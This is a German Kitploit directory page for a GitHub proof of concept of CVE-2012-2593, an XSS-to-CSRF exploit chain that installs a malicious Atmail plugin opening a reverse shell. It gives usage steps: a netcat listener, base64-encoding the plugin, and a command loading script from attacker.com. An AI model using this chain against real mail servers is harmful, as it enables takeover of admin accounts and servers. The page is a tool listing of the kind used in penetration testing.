Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE Exploit-Kette | Kitploit
Tools/GitHubGitHub/andrewtrube/cve-2012-2593
Exploit-FrameworksPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE Exploit-Kette

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Atmail XSS-CSRF-RCE Exploit-Kette PoC

atmail-rce.py: Nutzt CVE-2012-2593 im Webmail-Interface von Atmail aus. atmail-csrf.js: JavaScript-Datei, die CVE-2012-2593 in ein CSRF umwandelt, um ein bösartiges Plugin zu installieren, das eine Reverse Shell ausführt.

Plugin.php: Atmail-Plugin, das installiert wird und eine Reverse Shell aufruft.

!!Nur auf Servern verwenden, für die du eine Testberechtigung hast

Zusammenfassung

Der Atmail-E-Mail-Server Version 6.4 hat eine XSS-Schwachstelle sowohl im Date-E-Mail-Header als auch im E-Mail-Text (via iFrame-Injection). Diese wird zu einem CSRF ausgenutzt, indem die JavaScript XHR-API verwendet wird, um eine Anfrage mit dem Cookie des Admin-Benutzers an das Admin-Webpanel zu senden, wodurch ein bösartiges Plugin installiert wird, das Code für eine Reverse Shell ausführt.

Proof of Concept

  1. Starte einen Netcat-Listener nc -lvp 4444
  2. Öffne Plugin.php und ändere die IP-Adresse und den Port auf die deines Netcat-Listeners
  3. Komprimiere das Plugin mit gzip und kodiere es in Base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Kopiere und füge die obige Ausgabe in die Daten-Variable der atmail-csrf.js ein
  5. Führe das atmail-rce.py-Skript aus python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Warte, bis der Admin-Benutzer sich in seine E-Mail einloggt

Einschränkungen

  • Funktioniert nur, wenn das Ziel der XSS ein Admin-Benutzer von Atmail ist
  • Funktioniert nur, wenn das Ziel sowohl im Webmail-Interface als auch im Admin-Interface des Servers angemeldet ist
  • Funktioniert nur, wenn die Plugin-Installation auf dem Server erlaubt ist (standardmäßig aktiviert)
Tool herunterladen